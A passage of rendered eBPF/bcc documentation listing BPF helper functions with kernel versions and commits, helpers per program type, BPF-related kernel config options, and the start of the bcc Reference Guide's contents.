<tr><td><code>BPF_FUNC_timer_set_callback()</code></td><td>5.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b00628b1c7d595ae5b544e059c27b1f5828314b4"><code>b00628b1c7d5</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_timer_start()</code></td><td>5.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b00628b1c7d595ae5b544e059c27b1f5828314b4"><code>b00628b1c7d5</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_timer_cancel()</code></td><td>5.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b00628b1c7d595ae5b544e059c27b1f5828314b4"><code>b00628b1c7d5</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_trace_printk()</code></td><td>4.1</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/9c959c863f8217a2ff3d7c296e8223654d240569"><code>9c959c863f82</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_trace_vprintk()</code></td><td>5.16</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/10aceb629e198429c849d5e995c3bb1ba7a9aaa3"><code>10aceb629e19</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_user_ringbuf_drain()</code></td><td>6.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/20571567384428dfc9fe5cf9f2e942e1df13c2dd"><code>205715673844</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_adjust_head()</code></td><td>4.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/17bedab2723145d17b14084430743549e6943d03"><code>17bedab27231</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_adjust_meta()</code></td><td>4.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/de8f3a83b0a0fddb2cf56e7a718127e9619ea3da"><code>de8f3a83b0a0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_adjust_tail()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b32cc5b9a346319c171e3ad905e0cddda032b5eb"><code>b32cc5b9a346</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_get_buff_len()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/0165cc817075cf701e4289838f1d925ff1911b3e"><code>0165cc817075</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_load_bytes()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3f364222d032eea6b245780e845ad213dab28cdd"><code>3f364222d032</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_store_bytes()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3f364222d032eea6b245780e845ad213dab28cdd"><code>3f364222d032</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_output()</code></td><td>5.6</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/d831ee84bfc9173eecf30dbbc2553ae81b996c60"><code>d831ee84bfc9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_override_return()</code></td><td>4.16</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/9802d86585db91655c7d1929a4f6bbe0952ea88e"><code>9802d86585db</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sock_ops_cb_flags_set()</code></td><td>4.16</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b13d880721729384757f235166068c315326f4a1"><code>b13d88072172</code></a></td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<p>Note: GPL-only BPF helpers require a GPL-compatible license. The current licenses considered GPL-compatible by the kernel are:</p>
|
||
<ul>
|
||
<li>GPL</li>
|
||
<li>GPL v2</li>
|
||
<li>GPL and additional rights</li>
|
||
<li>Dual BSD/GPL</li>
|
||
<li>Dual MIT/GPL</li>
|
||
<li>Dual MPL/GPL</li>
|
||
</ul>
|
||
<p>Check the list of GPL-compatible licenses in your <a href="https://github.com/torvalds/linux/blob/master/include/linux/license.h">kernel source code</a>.</p>
|
||
<h2 id="program-types-1"><a class="header" href="#program-types-1">Program Types</a></h2>
|
||
<p>The list of program types and supported helper functions can be retrieved with:</p>
|
||
<pre><code class="language-sh">git grep -W 'func_proto(enum bpf_func_id func_id' kernel/ net/ drivers/
|
||
</code></pre>
|
||
<div class="table-wrapper"><table><thead><tr><th>Program Type</th><th>Helper Functions</th></tr></thead><tbody>
|
||
<tr><td><code>BPF_PROG_TYPE_SOCKET_FILTER</code></td><td><code>BPF_FUNC_skb_load_bytes()</code> <br> <code>BPF_FUNC_skb_load_bytes_relative()</code> <br> <code>BPF_FUNC_get_socket_cookie()</code> <br> <code>BPF_FUNC_get_socket_uid()</code> <br> <code>BPF_FUNC_perf_event_output()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_KPROBE</code></td><td><code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_stackid()</code> <br> <code>BPF_FUNC_get_stack()</code> <br> <code>BPF_FUNC_perf_event_read_value()</code> <br> <code>BPF_FUNC_override_return()</code> <br> <code>Tracing functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_SCHED_CLS</code> <br> <code>BPF_PROG_TYPE_SCHED_ACT</code></td><td><code>BPF_FUNC_skb_store_bytes()</code> <br> <code>BPF_FUNC_skb_load_bytes()</code> <br> <code>BPF_FUNC_skb_load_bytes_relative()</code> <br> <code>BPF_FUNC_skb_pull_data()</code> <br> <code>BPF_FUNC_csum_diff()</code> <br> <code>BPF_FUNC_csum_update()</code> <br> <code>BPF_FUNC_l3_csum_replace()</code> <br> <code>BPF_FUNC_l4_csum_replace()</code> <br> <code>BPF_FUNC_clone_redirect()</code> <br> <code>BPF_FUNC_get_cgroup_classid()</code> <br> <code>BPF_FUNC_skb_vlan_push()</code> <br> <code>BPF_FUNC_skb_vlan_pop()</code> <br> <code>BPF_FUNC_skb_change_proto()</code> <br> <code>BPF_FUNC_skb_change_type()</code> <br> <code>BPF_FUNC_skb_adjust_room()</code> <br> <code>BPF_FUNC_skb_change_tail()</code> <br> <code>BPF_FUNC_skb_get_tunnel_key()</code> <br> <code>BPF_FUNC_skb_set_tunnel_key()</code> <br> <code>BPF_FUNC_skb_get_tunnel_opt()</code> <br> <code>BPF_FUNC_skb_set_tunnel_opt()</code> <br> <code>BPF_FUNC_redirect()</code> <br> <code>BPF_FUNC_get_route_realm()</code> <br> <code>BPF_FUNC_get_hash_recalc()</code> <br> <code>BPF_FUNC_set_hash_invalid()</code> <br> <code>BPF_FUNC_set_hash()</code> <br> <code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_smp_processor_id()</code> <br> <code>BPF_FUNC_skb_under_cgroup()</code> <br> <code>BPF_FUNC_get_socket_cookie()</code> <br> <code>BPF_FUNC_get_socket_uid()</code> <br> <code>BPF_FUNC_fib_lookup()</code> <br> <code>BPF_FUNC_skb_get_xfrm_state()</code> <br> <code>BPF_FUNC_skb_cgroup_id()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_TRACEPOINT</code></td><td><code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_stackid()</code> <br> <code>BPF_FUNC_get_stack()</code> <br> <code>BPF_FUNC_d_path()</code> <br> <code>Tracing functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_XDP</code></td><td><code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_smp_processor_id()</code> <br> <code>BPF_FUNC_csum_diff()</code> <br> <code>BPF_FUNC_xdp_adjust_head()</code> <br> <code>BPF_FUNC_xdp_adjust_meta()</code> <br> <code>BPF_FUNC_redirect()</code> <br> <code>BPF_FUNC_redirect_map()</code> <br> <code>BPF_FUNC_xdp_adjust_tail()</code> <br> <code>BPF_FUNC_fib_lookup()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_PERF_EVENT</code></td><td><code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_stackid()</code> <br> <code>BPF_FUNC_get_stack()</code> <br> <code>BPF_FUNC_perf_prog_read_value()</code> <br> <code>Tracing functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_CGROUP_SKB</code></td><td><code>BPF_FUNC_skb_load_bytes()</code> <br> <code>BPF_FUNC_skb_load_bytes_relative()</code> <br> <code>BPF_FUNC_get_socket_cookie()</code> <br> <code>BPF_FUNC_get_socket_uid()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_CGROUP_SOCK</code></td><td><code>BPF_FUNC_get_current_uid_gid()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_LWT_IN</code></td><td><code>BPF_FUNC_lwt_push_encap()</code> <br> <code>LWT functions</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_LWT_OUT</code></td><td><code>LWT functions</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_LWT_XMIT</code></td><td><code>BPF_FUNC_skb_get_tunnel_key()</code> <br> <code>BPF_FUNC_skb_set_tunnel_key()</code> <br> <code>BPF_FUNC_skb_get_tunnel_opt()</code> <br> <code>BPF_FUNC_skb_set_tunnel_opt()</code> <br> <code>BPF_FUNC_redirect()</code> <br> <code>BPF_FUNC_clone_redirect()</code> <br> <code>BPF_FUNC_skb_change_tail()</code> <br> <code>BPF_FUNC_skb_change_head()</code> <br> <code>BPF_FUNC_skb_store_bytes()</code> <br> <code>BPF_FUNC_csum_update()</code> <br> <code>BPF_FUNC_l3_csum_replace()</code> <br> <code>BPF_FUNC_l4_csum_replace()</code> <br> <code>BPF_FUNC_set_hash_invalid()</code> <br> <code>LWT functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_SOCK_OPS</code></td><td><code>BPF_FUNC_setsockopt()</code> <br> <code>BPF_FUNC_getsockopt()</code> <br> <code>BPF_FUNC_sock_ops_cb_flags_set()</code> <br> <code>BPF_FUNC_sock_map_update()</code> <br> <code>BPF_FUNC_sock_hash_update()</code> <br> <code>BPF_FUNC_get_socket_cookie()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_SK_SKB</code></td><td><code>BPF_FUNC_skb_store_bytes()</code> <br> <code>BPF_FUNC_skb_load_bytes()</code> <br> <code>BPF_FUNC_skb_pull_data()</code> <br> <code>BPF_FUNC_skb_change_tail()</code> <br> <code>BPF_FUNC_skb_change_head()</code> <br> <code>BPF_FUNC_get_socket_cookie()</code> <br> <code>BPF_FUNC_get_socket_uid()</code> <br> <code>BPF_FUNC_sk_redirect_map()</code> <br> <code>BPF_FUNC_sk_redirect_hash()</code> <br> <code>BPF_FUNC_sk_lookup_tcp()</code> <br> <code>BPF_FUNC_sk_lookup_udp()</code> <br> <code>BPF_FUNC_sk_release()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_CGROUP_DEVICE</code></td><td><code>BPF_FUNC_map_lookup_elem()</code> <br> <code>BPF_FUNC_map_update_elem()</code> <br> <code>BPF_FUNC_map_delete_elem()</code> <br> <code>BPF_FUNC_get_current_uid_gid()</code> <br> <code>BPF_FUNC_trace_printk()</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_SK_MSG</code></td><td><code>BPF_FUNC_msg_redirect_map()</code> <br> <code>BPF_FUNC_msg_redirect_hash()</code> <br> <code>BPF_FUNC_msg_apply_bytes()</code> <br> <code>BPF_FUNC_msg_cork_bytes()</code> <br> <code>BPF_FUNC_msg_pull_data()</code> <br> <code>BPF_FUNC_msg_push_data()</code> <br> <code>BPF_FUNC_msg_pop_data()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_RAW_TRACEPOINT</code></td><td><code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_stackid()</code> <br> <code>BPF_FUNC_get_stack()</code> <br> <code>BPF_FUNC_skb_output()</code> <br> <code>Tracing functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_CGROUP_SOCK_ADDR</code></td><td><code>BPF_FUNC_get_current_uid_gid()</code> <br> <code>BPF_FUNC_bind()</code> <br> <code>BPF_FUNC_get_socket_cookie()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_LWT_SEG6LOCAL</code></td><td><code>BPF_FUNC_lwt_seg6_store_bytes()</code> <br> <code>BPF_FUNC_lwt_seg6_action()</code> <br> <code>BPF_FUNC_lwt_seg6_adjust_srh()</code> <br> <code>LWT functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_LIRC_MODE2</code></td><td><code>BPF_FUNC_rc_repeat()</code> <br> <code>BPF_FUNC_rc_keydown()</code> <br> <code>BPF_FUNC_rc_pointer_rel()</code> <br> <code>BPF_FUNC_map_lookup_elem()</code> <br> <code>BPF_FUNC_map_update_elem()</code> <br> <code>BPF_FUNC_map_delete_elem()</code> <br> <code>BPF_FUNC_ktime_get_ns()</code> <br> <code>BPF_FUNC_tail_call()</code> <br> <code>BPF_FUNC_get_prandom_u32()</code> <br> <code>BPF_FUNC_trace_printk()</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_SK_REUSEPORT</code></td><td><code>BPF_FUNC_sk_select_reuseport()</code> <br> <code>BPF_FUNC_skb_load_bytes()</code> <br> <code>BPF_FUNC_skb_load_bytes_relative()</code> <br> <code>Base functions</code></td></tr>
|
||
<tr><td><code>BPF_PROG_TYPE_FLOW_DISSECTOR</code></td><td><code>BPF_FUNC_skb_load_bytes()</code> <br> <code>Base functions</code></td></tr>
|
||
</tbody></table>
|
||
</div><div class="table-wrapper"><table><thead><tr><th>Function Group</th><th>Functions</th></tr></thead><tbody>
|
||
<tr><td><code>Base functions</code></td><td><code>BPF_FUNC_map_lookup_elem()</code> <br> <code>BPF_FUNC_map_update_elem()</code> <br> <code>BPF_FUNC_map_delete_elem()</code> <br> <code>BPF_FUNC_map_peek_elem()</code> <br> <code>BPF_FUNC_map_pop_elem()</code> <br> <code>BPF_FUNC_map_push_elem()</code> <br> <code>BPF_FUNC_get_prandom_u32()</code> <br> <code>BPF_FUNC_get_smp_processor_id()</code> <br> <code>BPF_FUNC_get_numa_node_id()</code> <br> <code>BPF_FUNC_tail_call()</code> <br> <code>BPF_FUNC_ktime_get_boot_ns()</code> <br> <code>BPF_FUNC_ktime_get_ns()</code> <br> <code>BPF_FUNC_trace_printk()</code> <br> <code>BPF_FUNC_spin_lock()</code> <br> <code>BPF_FUNC_spin_unlock()</code></td></tr>
|
||
<tr><td><code>Tracing functions</code></td><td><code>BPF_FUNC_map_lookup_elem()</code> <br> <code>BPF_FUNC_map_update_elem()</code> <br> <code>BPF_FUNC_map_delete_elem()</code> <br> <code>BPF_FUNC_probe_read()</code> <br> <code>BPF_FUNC_ktime_get_boot_ns()</code> <br> <code>BPF_FUNC_ktime_get_ns()</code> <br> <code>BPF_FUNC_tail_call()</code> <br> <code>BPF_FUNC_get_current_pid_tgid()</code> <br> <code>BPF_FUNC_get_current_task()</code> <br> <code>BPF_FUNC_get_current_uid_gid()</code> <br> <code>BPF_FUNC_get_current_comm()</code> <br> <code>BPF_FUNC_trace_printk()</code> <br> <code>BPF_FUNC_get_smp_processor_id()</code> <br> <code>BPF_FUNC_get_numa_node_id()</code> <br> <code>BPF_FUNC_perf_event_read()</code> <br> <code>BPF_FUNC_probe_write_user()</code> <br> <code>BPF_FUNC_current_task_under_cgroup()</code> <br> <code>BPF_FUNC_get_prandom_u32()</code> <br> <code>BPF_FUNC_probe_read_str()</code> <br> <code>BPF_FUNC_get_current_cgroup_id()</code> <br> <code>BPF_FUNC_send_signal()</code> <br> <code>BPF_FUNC_probe_read_kernel()</code> <br> <code>BPF_FUNC_probe_read_kernel_str()</code> <br> <code>BPF_FUNC_probe_read_user()</code> <br> <code>BPF_FUNC_probe_read_user_str()</code> <br> <code>BPF_FUNC_send_signal_thread()</code> <br> <code>BPF_FUNC_get_ns_current_pid_tgid()</code> <br> <code>BPF_FUNC_xdp_output()</code> <br> <code>BPF_FUNC_get_task_stack()</code></td></tr>
|
||
<tr><td><code>LWT functions</code></td><td><code>BPF_FUNC_skb_load_bytes()</code> <br> <code>BPF_FUNC_skb_pull_data()</code> <br> <code>BPF_FUNC_csum_diff()</code> <br> <code>BPF_FUNC_get_cgroup_classid()</code> <br> <code>BPF_FUNC_get_route_realm()</code> <br> <code>BPF_FUNC_get_hash_recalc()</code> <br> <code>BPF_FUNC_perf_event_output()</code> <br> <code>BPF_FUNC_get_smp_processor_id()</code> <br> <code>BPF_FUNC_skb_under_cgroup()</code></td></tr>
|
||
</tbody></table>
|
||
</div><div style="break-before: page; page-break-before: always;"></div><h1 id="kernel-configuration-for-bpf-features"><a class="header" href="#kernel-configuration-for-bpf-features">Kernel Configuration for BPF Features</a></h1>
|
||
<h2 id="bpf-related-kernel-configurations"><a class="header" href="#bpf-related-kernel-configurations">BPF Related Kernel Configurations</a></h2>
|
||
<div class="table-wrapper"><table><thead><tr><th style="text-align: left">Functionalities</th><th style="text-align: left">Kernel Configuration</th><th style="text-align: left">Description</th></tr></thead><tbody>
|
||
<tr><td style="text-align: left"><strong>Basic</strong></td><td style="text-align: left">CONFIG_BPF_SYSCALL</td><td style="text-align: left">Enable the bpf() system call</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_BPF_JIT</td><td style="text-align: left">BPF programs are normally handled by a BPF interpreter. This option allows the kernel to generate native code when a program is loaded into the kernel. This will significantly speed-up processing of BPF programs</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_BPF_JIT</td><td style="text-align: left">Enable BPF Just In Time compiler</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_EBPF_JIT</td><td style="text-align: left">Extended BPF JIT (eBPF)</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_CBPF_JIT</td><td style="text-align: left">Classic BPF JIT (cBPF)</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_MODULES</td><td style="text-align: left">Enable to build loadable kernel modules</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_BPF</td><td style="text-align: left">BPF VM interpreter</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_BPF_EVENTS</td><td style="text-align: left">Allow the user to attach BPF programs to kprobe, uprobe, and tracepoint events</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_PERF_EVENTS</td><td style="text-align: left">Kernel performance events and counters</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_PERF_EVENTS</td><td style="text-align: left">Enable perf events</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_PROFILING</td><td style="text-align: left">Enable the extended profiling support mechanisms used by profilers</td></tr>
|
||
<tr><td style="text-align: left"><strong>BTF</strong></td><td style="text-align: left">CONFIG_DEBUG_INFO_BTF</td><td style="text-align: left">Generate deduplicated BTF type information from DWARF debug info</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_PAHOLE_HAS_SPLIT_BTF</td><td style="text-align: left">Generate BTF for each selected kernel module</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_DEBUG_INFO_BTF_MODULES</td><td style="text-align: left">Generate compact split BTF type information for kernel modules</td></tr>
|
||
<tr><td style="text-align: left"><strong>Security</strong></td><td style="text-align: left">CONFIG_BPF_JIT_ALWAYS_ON</td><td style="text-align: left">Enables BPF JIT and removes the BPF interpreter to avoid speculative execution</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_BPF_UNPRIV_DEFAULT_OFF</td><td style="text-align: left">Disable unprivileged BPF by default by setting the <code>/proc/sys/kernel/unprivileged_bpf_disabled</code> knob to 2</td></tr>
|
||
<tr><td style="text-align: left"><strong>Cgroup</strong></td><td style="text-align: left">CONFIG_CGROUP_BPF</td><td style="text-align: left">Support for BPF programs attached to cgroups</td></tr>
|
||
<tr><td style="text-align: left"><strong>Network</strong></td><td style="text-align: left">CONFIG_BPFILTER</td><td style="text-align: left">BPF based packet filtering framework (BPFILTER)</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_BPFILTER_UMH</td><td style="text-align: left">This builds bpfilter kernel module with embedded user mode helper</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_NET_CLS_BPF</td><td style="text-align: left">BPF-based classifier - to classify packets based on programmable BPF (JIT'ed) filters as an alternative to ematches</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_NET_ACT_BPF</td><td style="text-align: left">Execute BPF code on packets. The BPF code will decide if the packet should be dropped or not</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_BPF_STREAM_PARSER</td><td style="text-align: left">Enable this to allow a TCP stream parser to be used with BPF_MAP_TYPE_SOCKMAP</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_LWTUNNEL_BPF</td><td style="text-align: left">Allow to run BPF programs as a nexthop action following a route lookup for incoming and outgoing packets</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_NETFILTER_XT_MATCH_BPF</td><td style="text-align: left">BPF matching applies a linux socket filter to each packet and accepts those for which the filter returns non-zero</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_IPV6_SEG6_BPF</td><td style="text-align: left">To support BPF seg6local hook. bpf: Add IPv6 Segment Routing helpers. <a href="https://github.com/torvalds/linux/commit/fe94cc290f535709d3c5ebd1e472dfd0aec7ee7">Reference</a></td></tr>
|
||
<tr><td style="text-align: left"><strong>kprobes</strong></td><td style="text-align: left">CONFIG_KPROBE_EVENTS</td><td style="text-align: left">This allows the user to add tracing events (similar to tracepoints) on the fly via the ftrace interface</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_KPROBES</td><td style="text-align: left">Enable kprobes-based dynamic events</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_KPROBES</td><td style="text-align: left">Check if kprobes are enabled</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_REGS_AND_STACK_ACCESS_API</td><td style="text-align: left">This symbol should be selected by an architecture if it supports the API needed to access registers and stack entries from pt_regs. For example the kprobes-based event tracer needs this API.</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_KPROBES_ON_FTRACE</td><td style="text-align: left">Have kprobes on function tracer if arch supports full passing of pt_regs to function tracing</td></tr>
|
||
<tr><td style="text-align: left"><strong>kprobe multi</strong></td><td style="text-align: left">CONFIG_FPROBE</td><td style="text-align: left">Enable fprobe to attach the probe on multiple functions at once</td></tr>
|
||
<tr><td style="text-align: left"><strong>kprobe override</strong></td><td style="text-align: left">CONFIG_BPF_KPROBE_OVERRIDE</td><td style="text-align: left">Enable BPF programs to override a kprobed function</td></tr>
|
||
<tr><td style="text-align: left"><strong>uprobes</strong></td><td style="text-align: left">CONFIG_UPROBE_EVENTS</td><td style="text-align: left">Enable uprobes-based dynamic events</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_ARCH_SUPPORTS_UPROBES</td><td style="text-align: left">Arch specific uprobes support</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_UPROBES</td><td style="text-align: left">Uprobes is the user-space counterpart to kprobes: they enable instrumentation applications (such as 'perf probe') to establish unintrusive probes in user-space binaries and libraries, by executing handler functions when the probes are hit by user-space applications.</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_MMU</td><td style="text-align: left">MMU-based virtualised addressing space support by paged memory management</td></tr>
|
||
<tr><td style="text-align: left"><strong>Tracepoints</strong></td><td style="text-align: left">CONFIG_TRACEPOINTS</td><td style="text-align: left">Enable inserting tracepoints in the kernel and connect to probe functions</td></tr>
|
||
<tr><td style="text-align: left"></td><td style="text-align: left">CONFIG_HAVE_SYSCALL_TRACEPOINTS</td><td style="text-align: left">Enable syscall enter/exit tracing</td></tr>
|
||
<tr><td style="text-align: left"><strong>Raw Tracepoints</strong></td><td style="text-align: left">Same as Tracepoints</td><td style="text-align: left"></td></tr>
|
||
<tr><td style="text-align: left"><strong>LSM</strong></td><td style="text-align: left">CONFIG_BPF_LSM</td><td style="text-align: left">Enable instrumentation of the security hooks with BPF programs for implementing dynamic MAC and Audit Policies</td></tr>
|
||
<tr><td style="text-align: left"><strong>LIRC</strong></td><td style="text-align: left">CONFIG_BPF_LIRC_MODE2</td><td style="text-align: left">Allow attaching BPF programs to a lirc device</td></tr>
|
||
</tbody></table>
|
||
</div><div style="break-before: page; page-break-before: always;"></div><h1 id="bcc-reference-guide"><a class="header" href="#bcc-reference-guide">bcc Reference Guide</a></h1>
|
||
<p>Intended for search (Ctrl-F) and reference. For tutorials, start with <a href="bcc-documents/tutorial.html">tutorial.md</a>.</p>
|
||
<p>This guide is incomplete. If something feels missing, check the bcc and kernel source. And if you confirm we're missing something, please send a pull request to fix it, and help out everyone.</p>
|
||
<h2 id="contents"><a class="header" href="#contents">Contents</a></h2>
|
||
<ul>
|
||
<li>
|
||
<p><a href="bcc-documents/reference_guide.html#bpf-c">BPF C</a></p>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#events--arguments">Events & Arguments</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-kprobes">1. kprobes</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-kretprobes">2. kretprobes</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-tracepoints">3. Tracepoints</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-uprobes">4. uprobes</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-uretprobes">5. uretprobes</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#6-usdt-probes">6. USDT probes</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#7-raw-tracepoints">7. Raw Tracepoints</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#8-system-call-tracepoints">8. system call tracepoints</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#9-kfuncs">9. kfuncs</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#10-kretfuncs">10. kretfuncs</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#11-lsm-probes">11. lsm probes</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#12-bpf-iterators">12. bpf iterators</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#data">Data</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-bpf_probe_read_kernel">1. bpf_probe_read_kernel()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-bpf_probe_read_kernel_str">2. bpf_probe_read_kernel_str()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-bpf_ktime_get_ns">3. bpf_ktime_get_ns()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-bpf_get_current_pid_tgid">4. bpf_get_current_pid_tgid()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-bpf_get_current_uid_gid">5. bpf_get_current_uid_gid()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#6-bpf_get_current_comm">6. bpf_get_current_comm()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#7-bpf_get_current_task">7. bpf_get_current_task()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#8-bpf_log2l">8. bpf_log2l()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#9-bpf_get_prandom_u32">9. bpf_get_prandom_u32()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#10-bpf_probe_read_user">10. bpf_probe_read_user()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#11-bpf_probe_read_user_str">11. bpf_probe_read_user_str()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#12-bpf_get_ns_current_pid_tgid">12. bpf_get_ns_current_pid_tgid()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#debugging">Debugging</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-bpf_override_return">1. bpf_override_return()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#output">Output</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-bpf_trace_printk">1. bpf_trace_printk()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-bpf_perf_output">2. BPF_PERF_OUTPUT</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-perf_submit">3. perf_submit()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-perf_submit_skb">4. perf_submit_skb()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-bpf_ringbuf_output">5. BPF_RINGBUF_OUTPUT</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#6-ringbuf_output">6. ringbuf_output()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#7-ringbuf_reserve">7. ringbuf_reserve()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#8-ringbuf_submit">8. ringbuf_submit()</a></li>
|
||
